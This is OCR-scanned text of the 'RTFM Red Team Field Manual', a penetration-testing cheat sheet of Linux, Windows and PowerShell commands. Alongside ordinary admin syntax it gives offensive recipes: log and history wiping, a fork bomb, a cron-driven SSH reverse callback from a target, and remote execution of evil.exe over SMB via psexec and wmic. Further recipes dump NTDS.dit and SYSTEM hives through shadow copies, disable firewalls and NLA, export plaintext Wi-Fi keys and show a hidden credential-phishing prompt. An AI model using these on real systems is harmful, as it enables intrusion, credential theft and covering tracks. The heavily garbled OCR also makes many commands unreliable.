RTFM Red Team Field Manual

rtfm-red-team-field-manual manual pdf -FilePursuit

rtfm%20red%20team%20field%20manual

rtfm-red-team-field-manual

RED-Team-Field-Manual

rtfm-red-team-field-manual

User Manual: manual pdf -FilePursuit

Open the PDF directly: View PDF PDF.
Page Count: 111

DownloadRTFM- Red Team Field Manual
Open PDF In BrowserView PDF
:E
'-

E-

=

j
9rz1
H

J':q

!
Q

E-4

&!

~

-1

~

u
z

iXl

C)

>

,...,

RTFM. Copyright © 2013 by Ben Clark

All rights reserved. No part of this work may be reproduced or transmitted
in any form or by any means, without prior written permission of the
copyright owner.

ISBN-10: 1494295504
ISBN-13: 9 7 8-1494295509
Technical Editor: Joe Vest
Graphic: Joe Vest

Product and company names mentioned herein may be the trademarks of their
respective owners. Rather than use a trademark symbol with every occurrence
of a trademarked name, the author uses the names only in an editorial
fashion, with no intention of infringement of the trademark. Use of a term
in this book should not be regarded as affecting the validity of any
trademark or service mark.
The information in this book is distributed 11 as is 11 • While everj precaution
was taken to ensure the accuracy of the material, the author assumes no
responsibility or liability for errors or omissions,
or for damages
resulting from the use of the information contained herein.

TABLE OF CONTENTS

*NIX .................................................................................................................................................................4
WINDOWS •••••..••.•.•••••••••••.•••••••••••...••..•••..•••.••.••...••..••••...•••.••.••••.•••••.••..••.•••.••••.•••.••...•••••..••..••••••..••••.••.••.•••••• 14
NETWORKING •••••..•••••••..••...••...••..••••.••••••••••.••••.•••..••••••.••••...•..••••••.•••••••••••.•••••••••.•••.••..••••••••••••••••••.•••••••••.••.•• 34
TIPS AND TRICKS ...••..•••..•••.••••••••..••••••.•••..••...•••••••••...•••.•••••••••••••.•••••.••.••••••..••••••••.•••.•••••••.••..••••••.••••••••.••.•..•••42
TOOL SYNTAX •••••••••••••••••••••••.••••.••••..•••••.•••••••••••••..••••••.••••.•.••••••••.••••••••..•••••.••.•••••••.••..•••••••••••••••••••••••••••••••..• 50
WEB •••••..•••.••.•••••••.••..•••..••...••..•••..••..••••••.•••...••..•••.••••••..••••..••.•••.••••••••.•••••••.••.•••••.•••••••••••..•••••••••..••.•••••••.••.••.• 66
DATABASES •••••••.•••••••...••..•••..••.•.•••••..••...•••.•••••.••••..••.•.••••.•...••.•••••.••.•••••..•••••.••.•••••..•••..•••••••••••••••••.•••••••••••••.•. 72
PROGRAMMING ............................................................................................................................................76
WIRELESS ..•••••••..•••••••..•••..•••..••...•••••••••...••..•••..•••••..••...••••.....••.••••.••..••••••.•••••.••.••••••.•••..•••••••••••••••••••••••••••••••.•. 84
REFERENCES •••..•••••••••••••.••••••.•••..••...•••••.•••..•••..••...•••••..••..••.•••••..•••••.••.•••••••••••••••••••..•••••..•••..••••.•••••••..••.••••••••••94
INDEX ••••...••••••••••••..••...••..•••..•••••••••••.••...••..•••••••••••.•••..••••••.•••••••••..•..•••••..•••••.••.•••.••••••..•••••••••••••••••.•••••••••••••.•. 95

THS Bonus Material added by 0E800
Nmap Cheat Sheet
Nmap Cheat Sheet 2
Wireshark Display Filters
Common Ports List
Google Cheat Sheet
Scapy
TCPDUMP
NAT
QoS
IPv4
IPv6
3

'-.-.j-'#'!lli-,··~

'"Hili!

f''{-•

w('

•-'lrt''MMfW-

'-)'''M«V#ffr'ZW¥11i!f--wiiMfM'M'WMi'""f%ffi!I'''IW""liH;:-~@

H~51~M

LINUX NETWORK COMMANDS
watch ss -tp
netstat -ant
netstat -tulpn
lsof -i
smb:// ip /share
share user x.x.x.x c$
smbclient -0 user\\\\ ip \\ share
ifconfig eth# ip I cidr
ifconfig ethO:l ip I cidr
route add default gw gw lp
ifconfig eth# mtu [size]
export l1AC=xx: XX: XX: XX: XX: XX
ifconfig int hw ether t~AC
macchanger -m l1AC
int
iwlist int scan
dig -x ip
host ip
host -t SRV
service tcp.url.com
dig @ ip domain -t AXrR
host -1 domain
namesvr
ip xfrm state list
ip addr add ip I cidr aev ethO
/var/log/messages I grep DHCP
tcpkill host ip and port port
echo "1"
/proc/sys/net/ipv4/ip forward
echo ''nameserver x.x.x.x''
/etc7resolv.conf

Network connections
Tcp connections -anu=udp
Connections with PIDs
Established connections
Access windows smb share
Mount Windows share
Sl1B connect
Set IP and netmask
Set virtual interface
Set GW
Change t~TO size
Change t~AC
Change t~AC
Backtrack t~AC changer
Built-in wifi scanner
Domain lookup for IP
Domain lookup for IP
Domain SRV lookup
DNS Zone Xfer
DNS Zone Xfer
Print existing VPN kejs
Adds 'hidden' interface
List DHCP assignments
Block ip:port
Turn on IP Forwarding
Add DNS Server

LINUX SYSTEM INFO

Current username
Logged on users
User information
Last users logged on
Process listing (top)
Disk usage (free)
Kernel version/CPU info
t1ounted file Sjstems
Show list of users
Add to PATH variable
Kills process with pid
Show OS info
Show OS version info
Show kernel info
Installed pkgs (Redhat)
Install RPM (-e~remove)
Installed pkgs (Obuntu)
Install DEB (-r~remove)
Installed pkgs (Solaris)
Show location of executable
Disable shell , force bash

id
w

who -a
last -a
ps -ef
df -h
uname -a
mount
getent passwd
PATH~$PATH:/home/mypath

kill pid
cat /etc/issue
cat /etc/'release'
cat /proc/version
rpm --querJ -all
rpm -ivh ) .rpm
dpkg -get-selections
dpkg -I '.deb
pkginfo
which tscsh/csh/ksh/bash
chmod -so tcsh/csh/ksh

5

«;~"'

LINUX UTILITY COMMANDS
wget http:// url -0 url.txt -o /dev/null
rdesktop ip
scp /tmp/file user@x.x.x.x:/tmp/file
scp user@ remoteip :/tmp/file /tmp/file
useradd -m user
passwd user
rmuser unarne
script -a outfile
apropos subject
history
! num

Grab url
Remote Desktop to ip
Put file
Get file
Add user
Change user password
Remove user

Record shell : Ctrl-D stops
Find related command
View users command history

Executes line # in history

LINUX FILE COMMANDS
diff filel file2
rm -rf dir
shred -f -u file
touch -r ref file
file
touch -t YYYY11t1DDHHSS file
sudo fdisk -1
mount /dev/sda# /mnt/usbkey
md5sum -t file
echo -n "str 11

Compare files
Force delete of dir
Overwrite/delete file
t1atches ref_ file timestamp
Set file timestamp
List connected drives

I md5sum

shalsum file
sort -u
grep -c ''str'' file
tar cf file.tar files
tar xf file.tar
tar czf file.tar.gz files
tar xzf file.tar.gz
tar cjf file.tar.bz2 files
tar xjf file.tar.bz2
gzip file
gzip -d file. gz
upx -9 -o out.exe orig.exe

zip -r zipname.zip \Directory\'
dd skip=lOOO count=2000 bs=S if=file of=file
split -b 9K \ file
prefix
awk 'sub("$"."\r")' unix.txt

win.txt

find -i -name file -type '.pdf
find I -perm -4000 -o -perm -2000 -exec ls ldb {) \;
dos2unix file
file file
chattr (+/-)i file

LINUX

~SC

unset HISTFILE
ssh user@ ip arecord - I aplay gee -o outfile myfile.c
init 6
cat /etc/ 1 syslog 1 .conf 1 grep -v ''"#''
grep 'href='
file
1 cut -d"/" -f3
I grep
url
lsort -u
dd if=/dev/urandom of= file bs=3145"28
count=lOO

t1ount USB key
Compute md5 hash
Generate md5 hash
SHAl hash of file
Sort/show unique lines
Count lines w/ ''str''
Create .tar from files
Extract .tar
Create .tar.gz
Extract .tar.gz
Create .tar.bz2
Extract .tar.bz2
Compress/rename file
Decompress file.gz
UPX packs orig.exe
Create zip
Cut block 1K-3K from file
Split file into 9K chunks
Win compatible txt file
Find PDF files
Search for setuid files
Convert to

~nix

format

Determine file type/info
Set/Unset immutable bit

COMMANDS
Disable history logging
Record remote mic

Compile C,C++
Reboot (0 = shutdown)
List of log files
Strip links in url.com
l1ake random 311B file

LINUX

II

COVER YOUR TRACKS II COMMANDS

echo ""
/var/log/auth.log
echo ''''
-/.bash history
rrn -/.bash histor/ -rf
history -c
export HISTFILESIZE=O
export HISTSIZE=O
unset HISTFILE
kill -9 $$
ln /dev/null -/.bash_historj -sf

Clear auth.log file
Clear current user bash history
Delete .bash_history file
Clear current session history
Set historj max lines to 0
Set histroy max commands to 0
Disable history logging (need to
logout to take effect)
Kills current session
Perrnanentlj send all bash history
commands to /dev/null

LINUX FILE SYSTEM STRUCTURE
/bin
/boot
/dev
/etc
/horne
/lib
/opt
/proc
/root
/sbin
/trnp
/usr
/var

User binaries
Boot-up related files
Interface for system devices
Sjstern configuration files
Base directory for user files
Critical software libraries
Third party software
Sjstern and running programs
Home directory of root user
System administrator binaries
Temporary files
Less critical files
Variable Sjstern files

LINUX FILES
/etc/shadow
/etc/passwd
/etc/group
/etc/rc.d
/etc/init.d
/etc/hosts
/etc/HOSTNAl1E
/etc/network/interfaces
/etc/profile
/etc/apt/sources.list
/etc/resolv.conf
/horne/ user /.bash historj
/usr/share/wireshark/rnanuf
-/.ssh/
/var/log
/var/adrn
/var/spool/cron
/var/log/apache/access.log
/etc/fstab

Local users' hashes
Local users
Local groups
Startup services

Service
Known hostnames and IPs
Full hostnarne with domain
Network configuration

System environment variables
Ubuntu sources list
Narneserver configuration
Bash history (also /root/)
Vendor-t1AC lookup
SSH keystore
System log files (most Linux)
System log files (Unix)
List cron files
Apache connection log
Static file system info

LINUX SCRIPTING
PING SWEEP
for x in {1 .. 254 .. l};do ping -c 1 l.l.l.$x lgrep "64 b" lcut -d" "-f4
ips.txt; done

AUTOMATED DOMAIN NAME RESOLVE BASH SCRIPT
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1 .. 254 .. l};do
host $range.$ip lgrep 11 name pointer 11 lcut -d"
done

FORK BOMB

11

-fS

(CREATES PROCESSES UNTIL SYSTEM "CRASHES")

: (){:I: & I;:

DNS REVERSE LOOKUP
for ip in {1 .. 254 .. 1}; do dig -x l.l.l.$ip

IP

I

grep $ip

dns.txt; done;

BANNING SCRIPT

#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while
$i -le 253 l
do
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: arp -s 192.168.1.$i"
arp -s 192.168.1.$i OO:OO:OO:OO:OO:Oa
else
echo 11 IP NOT BANNED: 192.168.1.$i 1 .'.A~.'AJ..J.J,l!A.l.!J..J!AJ..AAAAJ.II
eChO

11.1} J A}. J, I A J. 11 A A .1. /.). J. I 1 J.} J. I A I I I.) 1 .I A).. A .l. J. J.} .I),).. J.}.}).. J. A A; J, J,. J.ll

fi
i='expr $i +1'
done

8

-;~"-- (':it'ieit#'r'filff

SSH

I! .

l

•

'f

-·

,.

..

.. ..

--·--·~

CALLBACK

Set up script in crontab to callback ever} X minutes.
Highlj recommend JOU
set up a generic user on red team computer (with no shell privs).
Script
will use the private kej (located on callback source computer) to connect
to a public key (on red team computer). Red teamer connects to target via a
local SSH session (in the example below, use #ssh -p4040 localhost)
#!/bin/sh
Callbac~: script located on callback source computer
(target)
killall ssh /dev/null 2 &1
sleep 5
REMLIS-4040
REMUSR-user
HOSTS=''domainl.com domain2.com domain3.com''
for LIVEHOST in SHOSTS;
do
COUNT-S(ping -c2 $~!VEHOST I grep 'received'
awk -F','
$2 } '
awk ' ( print $1 I 'I
if [ [ $COUN7 -gt 0 ; ] ; then
ssh -R $(REMLIS}:localhost:22 -i
"/home/$(REMUSR}/.ssh/id rsa" -N $(LIVEHOST} -1 $(REMUSR}

#

1

:i

' ( print

IPTABLES

iptables-restore
file
iptables -~ -v --line-numbers
iptables -F
iptables -P INPUT/FORWARD/OUTPUT
ACCEPT/REJECT/DROP
iptables -A INPUT -i
interface -m state -state RELATED,ESTABLcSHED -j ACCEPT
iptables -D INPUT iptables -t raw -L -n
iptables -P INPUT DROP

ALLOW

SSH

ON PORT

22

counters) rules to stdout
Restore iptables rules
List all iptables rules with
affected and line numbers
Flush all iptables rules
Change default polic; for
rules that don't match rules
Allow established
connections on INPUT
Delete cth inbound rule
Increase throughput b;
turning off statefulness
Drop all packets

OUTBOUND

iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state
NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i
iface -p tcp --sport 22 -m state --state
ESTABLISHED -j ACCEPT

ALLOW

ICMP

OUTBOUND

iptacles -A OUTPUT -i
iface -p icmp --icmp-t;pe echo-request -j ACCEPT
iptables -A INPUT -o iface -p icmp --icmp-tjpe echo-repl; -j ACCEPT

PORT FORWARD
echo "1"
/proc/sjs/net/lpv4/lp forward
OR- SJSCtl net.lpv4.lp forward~1
iptables -t nat -A PREROUTING -p tcp -i ethO -j DNAT -d pivotip --dport
443 -to-destination attk 1p :443
iptables -t nat -A POSTROUTING -p tcp -i ethC -j SNAT -s target subnet
cidr -d attackip --dport 443 -to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT

ALLOW ONLY

1.1.1. 0/24,

PORTS

80,443

AND LOG DROPS TO

/VAR/LOG/MESSAGES
iptables -A INPU~ -s 1.1.1.0/24 -m state --state RELATED,ESTAB~ISHED,NEW
-p tcp -m multipart --dports 80,443 -j ACCEPT
iptables -A INPUT -i ethO -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o ethO -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP

10

UPDATE-RC.D
• Check/change startup services
service --status-all

[+] Service starts at boot
[-] Service does not start

service service start
service service stop
service service status
update-rc.d -f service remove

Start a service
Stop a service
Check status of a service
Remove a service start up cmd (-

update-rc.d

f if the /etc/init.d start up
file exists I
Add a start up service

service

defaults

CHKCONFIG
• Available in Linux distributions such as Red Hat Enterprise Linux (RHEL),
CentOS and Oracle Enterprise Linux (OEL)
chkconfig --list
chkconfig
chkconfig

List existing services and run

service
service

status
Check single service status
Add service [optional to add
level at which service runs]
Remove service

-list
on [--level 3]

chkconfig service off [--level 3]
e.g. chkconfig iptables off

SCREEN
(C-a
screen -S name
screen -ls
screen -r name
screen -S name
C-a
C-a d
C-a D D
C-a c
C-a C-a
C-a ' numlname
C-a "
C-a k
C-a S
C-a V
C-a tab
C-a X
C-a Q

~~

Control-a)
Start new screen with name
List running screens

-X

Attach to screen name
Send crnd to screen anrne
List keybindings (help)
Detach
Detach and logout
Create new window
Switch to last active window
Switch to window numlname
See windows list and change
Kill current window
Split display horizontally
Split display vertically
Jump to next display
Remove current region
Remove all regions but current

cmd

11

Xll
CAPTURE REMOTE

Xll

WINDOWS AND CONVERT TO

JPG

xwd -display ip :0 -root -out /tmp/test.xpm
xwud -in /tmp/test1.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg

OPEN

Xll

STREAM VIEWING

xwd -display 1.1.1.1:0 -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP

TCPDUMP
CAPTURE PACKETS ON ETH0 IN ASCII AND HEX AND WRITE TO FILE
tcpdump -i ethO -XX -w out.pcap

CAPTURE HTTP TRAFFIC TO

2 .2 .2 .2

tcpdump -i ethO port 80 dst 2.2.2.2

SHOW CONNECTIONS TO A SPECIFIC IP
tcpdump -i ethO -tttt dst 192.168.1.22 and not net 192.168.1.0/24

PRINT ALL PING RESPONSES
tcpdump -i ethO 'icmp[icmptype] == icmp-echoreply'

CAPTURE 50 DNS PACKETS AND PRINT TIMESTAMP
tcpdump -i ethO -c 50 -tttt 'udp and port 53'

NATIVE KALI COMMANDS
WMIC EQUIVALENT
wmis -U DOMAIN\ user % password

MoUNT

SMB

II· DC

cmd.exe /c

command

SHARE

# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs // ip /share /mnt/share -o
user= user ,pass= pass ,sec=ntlrnssp,domain= domain ,rw

UPDATING KALI
apt-get update
apt-get upgrade

12

PFSENSE
pfSsh.php
pfSsh.php playback enableallowallwan

pfSense Shell System
Allow all inbound WAN
connections (adds to visible
rules in WAN rules)
Enable ssh inbound/outbound
Show NAT rules
Show filter rules
Show all rules
Edit config
Remove cached (backup)
config after editing the
current running
Reload entire config

pfSsh.php playback enablesshd
pfctl -sn
pfctl -sr
pfctl -sa
viconfig
rm /tmp/config.cache

/etc/rc.reload_all

SOLARIS
ifconfig -a
netstat -in
ifconfig -r
ifconfig ethO dhcp
ifconfig ethO plumb up ip netmask nmask
route add default ip
logins -p
svcs -a
prstat -a
svcadm start ssh
inetadm -e telnet
(-d for disable)
prtconf I grep Memorj
iostat -En
showrev -c /usr/bin/bash
shutdown -i6 -gO -y
dfmounts
smc
snoop -d int -c pkt # -o results.pcap
/etc/vfstab
/var/adm/logging
/etc/default/'
/etc/system
/var/adm/messages
/etc/auto '
/etc/inet/ipnodes

13

List of interfaces
List of interface
Route listing
Start DHCP client
Set IP
Set gateway
List users w/out passwords
List all services w/ status
Process listing (top)
Start SSH service
Enable telnet
Total physical memory
Hard disk size
Information on a binary
Restart system
List clients connected NFS
t1anagement GUI
Packet capture
File system mount table
Login attempt log
Default settings
Kernel modules & config
Syslog location
Automounter config files
IPv4/IPv6 host file

WINDOWS VERSIONS
NT
NT
NT
NT
NT
NT
NT

Windows NT 3.1 (All)
Windows NT 3.5 (All)
Windows NT 3.51 (All)
Windows NT 4.0 (All)
Windows 2000 (All)
Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
Windows XP (64-bit, Pro 64-bit)
Windows Server 2003 & R2 (Standard, Enterprise)
Windows Home Server
Windows Vista (Starter, Home, Basic, Home Premium,
Business, Enterprise, Ultimate)
Windows Server 2008 (Foundation, Standard, Enterprise)
Windows ~ (Starter, Home, Pro, Enterprise, Ultimate)
Windows Server 2008 R2 (Foundation, Standard, Enterprise)
Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM))
Windows Phone 8
Windows Server 2012 (Foundation, Essentials, Standard)

3.1
3.5
3.51
4.0
5.0
5.1
5.2

NT 6.0

NT 6.1
NT 6.2

WINDOWS FILES
%SYSTEt~ROOT%

%SYSTEMROOT%\System32\drivers\etc\hosts
%SYSTEMROOT%\System32\drivers\etc\networks
%SYSTEt~ROOT% \ system32 \ config\SAM
%SYSTEMROOT%\repair\SAt~
%SYSTEMROOT%\System32\config\RegBack\SAt~

%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
%USERPROFILE%\Start Menu\Programs\Startup\
%SYSTEMROOT%\Prefetch

Typically C:\Windows
DNS entries
Network settings
User & password hashes
Backup copy of SAt~
Backup copy of SAt~
Application Log
Security Log
Startup Location
Startup Location
Prefetch dir (EXE logs)

STARTUP DIRECTORIES
WINDOWS

NT 6.1,6.0

# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup

WINDOWS

NT 5.2, 5.1, 5.0

%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup

WINDOWS

9x

%SystemDrive%\wmiOWS\Start Menu\Programs\Startup

WINDOWS

NT 4. 0, 3. 51, 3. 50

%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
15

WINDOWS SYSTEM INFO COMMANDS
ver
sc query state=all
tasklist /svc
tasklist /m
tasklist /S ip /v
taskkill /PID pid /F
systeminfo /S ip /U domain\user /P Pwd
reg query\\ ip \ RegDomain \ Key /v
Value
reg query HKLM /f password /t REG SZ /s
fsutil fsinfo drives
dir /a /s /b c:\'.pdf'
dir /a /b c:\windows\kb'
findstr /si password' .txt I •.xmll •.xls
tree /F /A c:\
tree.txt
reg save HKLl~\Security security.hive
echo %USERNAl~E%

Get OS version
Show services
Show processes & services
Show all processes & DLLs
Remote process listing
Force process to terminate
Remote system info
Query remote registry,
/s=all values
Search registrj for password
List drives •must be admin
Search for all PDFs
Search for patches
Search files for password
Directory listing of C:
Save securitj hive to file
Current user

WINDOWS NET /DOMAIN COMMANDS
net view /domain
net view /domain: [t~YDOHAIN]
net user /domain
net user user
pass /add
net localgroup "Administrators" user /add
net accounts /domain
net localgroup "Administrators"
net group /domain
net group "Domain Adrnins" /domain
net group "Domain Controllers /domain
net share
net session I find I "\\"
net user user /ACTIVE:jes /domain
net user user '' newpassword '' /domain
net share share c:\share
/GRANT:Everyone,FULL
11

Hosts in current domain
Hosts in [l~YDOl1AIN]
All users in current domain
Add user
Add user to Administrators
Domain password policy
List local Admins
List domain groups
List users in Domain Adrnins
List DCs for current domain
Current SMB shares
Active SHB sessions
Unlock domain user account
Change domain user password
Share folder

WINDOWS REMOTE COMMANDS
tasklist /S ip /v
systeminfo /S ip /U domain\user /P Pwd
net share \\ ip
net use \\ ip
net use z: \\ ip \share password
/user: D0l1AIN\ user
reg add \\ ip \ regkej \ value
sc \\ ip create service
binpath=C:\Windows\System32\x.exe start=
auto
xcopy /s \\ ip \dir C:\local
shutdown /m \\ ip /r /t 0 /f

16

Remote process listing
Remote systeminfo
Shares of remote computer
Remote filesystem (IPC$)
l~ap drive, specified
credentials
Add registry key remotely
Create a remote service
(space after start=)
Copy remote folder
Remotely reboot machine

WINDOWS NETWORK COMMANDS
ipconfig I all
ipconfig /displaydns

IP configuration
Local DNS cache

netstat -ana

Open connections

netstat -anop tcp 1
netstat -ani findstr LISTENING

Netstat loop
LISTENING ports
Routing table
Known l1ACs (ARP table I
DNS Zone Xfer

route print

arp -a
nslookup, set type=any, ls -d domain
results.txt, exit

nslookup -type=SRV _www._tcp.url.com
tftp -I ip GET remotefile
netsh wlan show profiles
netsh firewall set opmode disable
netsh wlan export profile folder=. key=clear
netsh interface ip show interfaces

netsh
ip
netsh
netsh

interface ip
nmask
gw
interface ip
interface ip

set address local static
ID
set dns local static ip
set address local dhcp

Domain SRV lookup ( ldap,
kerberos,
sip)
TFTP file transfer
Saved wireless profiles
Disable firewall ('Old)
Export wifi plaintext pwd
List interface IDs/MTUs
Set IP
Set DNS server
Set interface to use DHCP

WINDOWS UTILITY COMMANDS
Display file contents
Forceably delete all files
in path

type file
del path\' .• /a /s /q /f
find /I ''str''

command
at HH:Ml1
/c)

filename

Find "str"

find /c /v
file
[args] (i.e. at 14:45 cmd
I

runas /user: user

" file

[args]

Line count of cmd output
Schedule file to run
Run

11

file

as

user

restart /r /t 0
tr -d '\15\32'
win.txt
unix.txt
makecab file
Wusa.exe /uninstall /kb: ###
cmd.exe "wevtutil qe Application /c:40
/f:text /rd:true"
lusrrngr.rnsc

Restart now

services.msc

Services control panel
Task manager
Security policy manager

taskmgr.exe
secpool.rnsc
eventvwr.rnsc

Removes CR & 'Z ('nix)
Native compression
Uninstall patch
CLI Event Viewer
Local user manager

Event viewer

1?

MISC.

COMMANDS

LoCK WORKSTATION
rundll32.dll user32.dll LockWorkstation

DISABLE WINDOWS FIREWALL
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

NATIVE WINDOWS PORT FORWARD ( * MUST BE ADMIN)
netsh interface portproxy add v4tov4 listenport=3000
listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2
#Remove
netsh interface portproxy delete v4tov4 listenport=3000
listenaddress=l.l.l.l

RE-ENABLE COMMAND PROMPT
reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /t
REG DWORD /d 0 /f

PSEXEC
EXECUTE FILE HOSTED ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS
psexec /accepteula \\ targetiP
\\ smbiP \share\file.exe

-u domain\user -p password -c -f

RUN REMOTE COMMAND WITH SPECIFIED HASH
psexec /accepteula \\ ip
c:\Progra-1

-u Domain\user -p

RUN REMOTE COMMAND AS SYSTEM
psexec /accepteula \\ ip

-s cmd.exe

18

Lt1

NTLH

cmd.exe /c dir

TERMINAL SERVICES

(RDP)

START RDP
1.
2.
3.
4.

5.
6.

Create regfile.reg file with following line in it:
HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService
"fDe~yTSCo~nections"=dword: 00000000
reg import reg file. reg

net start ''terrnservice''
sc config terrnservice start= auto
net start terrnservice
--OR-

reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

TUNNEL RDP OUT PORT 443 (MAY NEED TO RESTART TERMINAL SERVICES)
REG ADD "HKLt1\System\CurrentControlSet\Control \Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

DISABLE NETWORK LEvEL AUTHENTICATION 1 ADD FIREWALL EXCEPTION
reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable

IMPORT A SCHEDULE TASK FROM AN "EXPORTED TASK"

XML

schtasks.exe /create /tn t1yTask /xml "C:\l1yTask.xml" /f

19

WMIC
wmic [alias] get /?
wmic [alias] call /?
wmic process list full

List all attributes
Callable methods
Process attributes

wmic startupwmic service

Starts wmic service

wmic ntdomain list
wmic qfe

Domain and DC info
List all patches

wrnic process call create "process name"
wmic process where name="process" call
terminate

Execute process
Terminate process

wmic logicaldisk get description,name
wmic cpu get DataWidth /format:list

View logical shares
Display 32 I I 64 bit

WMIC

[ALIAS]

[alias]

[WHERE]

[CLAUSE]

== process, share, startup, service, nicconfig, useraccount, etc.

[where] ==where (name="cmd.exe"), where (parentprocessid!=[pid]"), etc.
[clause] ==list [fulllbrief], get [attribl, attrib2], call [method],
delete

EXECUTE FILE HOSTED OVER SMB ON REMOTE SYSTEM WITH SPECIFIED
CREDENTIALS
wmic /node: targetiP /user:domain\user /password:password process call
create "\ \ smbiP \share\evil.exe"

UNINSTALL SOFTWARE
# Get software names

wmic product get name /value

wmic product where name= 11 XXX" call uninstall /nointeractive

REMOTELY DETERMINE LOGGED IN USER
wmic /node:remotecomputer computersystern get username
~OTE PROCESS LISTING EVERY SECOND

wmic /node:machinename process list brief /every:l
~TELY START

RDP

wmic /node:"machinename 4" path Win32_TerminalServiceSetting where

AllowTSConnections=''O'' call SetAllowTSConnections ''1''

LIST NUMBER OF TIMES USER HAS LOGGED ON
wmic netlogin where (name like "%adm%") get numberoflogons

SEARCH FOR SERVICES WITH UNQUOTED PATHS TO BINARY
wmic service get narne,displayname,pathnarne,startrnode lfindstr /i nauton
lfindstr /i /v C:\windows\\'' lfindstr /i /v 111111
11

20

-------~----

'1 - v t

t•

-r

Wfrl-iriWHfif

';+-:,i·~ilw:oo¢:M

VOLUME SHADOW COPY
1.

wmic /node: DC IP /user:"DOI1AIN\user" /password:"PASS
call create "cmd /c vssadmin list shadows 2 &1
c:\temp\output.txt"

11

process

If anJ copies alread1 ex~st then exfil, otherwise create using
following commands. Check output.txt for anJ errors
2.

3.

wmic /node: DC IP /Jser: D0l1AIN\u.ser" /password: PASS process
call create "cmd /c vssadmin create shadow /for=C: 2 &1
C:\temp\output.txt"
wmic /node: DC IP /user: DOHAIN\user" /password:"PASS" process
call create "cmd /c copJ
11

11

11

11

\\?\GLOBALROOT\Device\HarddiskVol~meShadowCopy1\Windows\System32\co

4.

nfig\SYSTEM C:\temp\system.hive 2 &1
C:\temp\output.txt"
wmic /node: DC IP /user: "DOl'.llUN\user" /password: PASS" process
call create ''crnd /c copJ
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyc\NTDS\NTDS.dit
C:\temp\ntds.dit 2 &1
C:\temp\output.txt"
11

Step bj step instructions
5.

o~

roorn362.com for step below

From Linux, download and run ntdsxtract and libesedb to export
tashes or other domain information
a.
Additional instructions found under the VSSOW~ section
b.
ntdsx~ract- http://www.ntdsxtract.com
c.
libesedb- http://code.google.com/p/libesedb/

21

y m"ih2ci$$i

POWERS HELL

get-content
file
get-help command -examples
get-command ' string '
get-service
get-wmiobject -class win32 service
$PSVesionTable
powershell.exe -version 2.0
get-service
measure-object
get-psdrive

get-process

select -expandproperty name

get-help ' -parameter credential
get-wmiobject -list -'network
(Net.DNS]: :GetnostEntry(" ip "I

CLEAR SECURITY

& APPLCIATION

displaJs file contents
Shows examples of command
Searches for cmd string
Displajs services (stopservice, start-service)
Displays services, but takes
alternate credentials
DisplaJ powershell version
Run powershell 2.0 from 3.0
Returns # of services
Returns list of PSDrives
Returns only names
Cmdlets that take creds
Available WMI network cmds
DNS Lookup

EVENT LOG FOR REMOTE SERVER(S~Ol)

Get-EventLog -list
Clear-EventLog -logname Application,

Security -computername SVR01

EXPORT OS INFO INTO CSV FILE
Get-WmiObject -class win32 operatingsjstem I select -property
csv c:\os.txt

1

1 export-

LIST RUNNING SERVICES
Get-Service

I

where object {$ .status -eq ''Running''}

PERSISTENT PSDRIVE TO REMOTE FILE SHARE:
New-PSJrive -Persist -PSProvider FileSjstem -Root \\1.1.1.1\tools -Name i

RETURN FILES WITH WRITE DATE PAST

8/2 0

Get-Childitem -Path c:\ -Force -Rec~rse -Filter '.log -ErrorAction
Silentl~Con~inue I where {$ .LastWriteTime -gt ''2012-08-20''}

FILE DOWNLOAD OVER HTTP
(new-object sjstem.net.webclient) .downloadFile(''url'',''dest'')

TCP PORT CONNECTION (SCANNER)
$ports=(#,#,#) ;$ip="x.x.x.x";foreach ($port in $ports) {trJ($socket=Newobject Sjste~.Net.Sockets.TCPClient($ip,$port); }catch(};if ($socket -eq
$NULL) (echo $ip":"$port"- Closed";}else(echo $ip":"$port"- Open";$socket
=$NULL;}}

PING WITH

500

MILLISECOND TIMEOUT

$ping = New-Object Sjstex.Net.Networkinformation.ping
$ping.Send('' ip '',5JO)
22

BASIC AUTHENTICATION POPUP
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential( 11 title ", 11 message 11 1 11 user"

RUN EXE EVERY 4 HOURS BETWEEN AUG
0800-1700 (FROM CMo. EXE)

11

domain")

